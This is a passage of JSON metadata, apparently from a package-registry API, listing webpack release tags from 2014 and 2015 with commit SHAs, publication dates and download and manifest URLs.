pack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1